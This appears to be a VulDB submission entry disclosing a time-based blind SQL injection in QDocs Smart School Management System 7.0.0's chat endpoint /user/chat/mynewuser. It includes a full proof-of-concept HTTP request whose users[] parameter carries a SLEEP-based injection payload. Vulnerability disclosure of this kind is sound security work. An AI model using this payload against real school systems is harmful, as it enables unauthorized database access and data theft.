| Titel | QDocs QDocs Smart School Management System 7.0.0 SQL Injection |
|---|
| Beschreibung |
A time-based blind SQL injection vulnerability has been discovered in the QDocs Smart School Management System, specifically in the chat system. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. This allows an authenticated attacker, with student privileges, to inject malicious SQL queries that can delay the server’s response using the SLEEP() function, thereby confirming the presence of an injection vulnerability without directly revealing data.
This kind of attack can be leveraged to infer sensitive information or cause unauthorized actions within the database, which could compromise the integrity and confidentiality of the system.
Impact:
Execute Arbitrary SQL Commands
Infer Sensitive Information
Compromise Data Integrity
Proof of Concept (PoC):
POST /user/chat/mynewuser HTTP/1.1
Host: [placeholder-host]
Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft
Content-Length: 79
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Linux"
Origin: https://[placeholder-host]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[placeholder-host]/webtest/user/chat
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM
Discovered By: Jobyer Ahmed
|
|---|
| Quelle | ⚠️ https://github.com/bytium/vulnerability-research/blob/main/Advisory%20for%20Time-Based%20Blind%20SQL%20Injection%20in%20QDocs%20Smart%20School.md |
|---|
| Benutzer | suffer (UID 74855) |
|---|
| Einreichung | 12.09.2024 23:41 (vor 2 Jahren) |
|---|
| Moderieren | 13.09.2024 15:09 (15 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 277435 [QDocs Smart School Management System 7.0.0 Chat /user/chat/mynewuser users[] SQL Injection] |
|---|
| Punkte | 20 |
|---|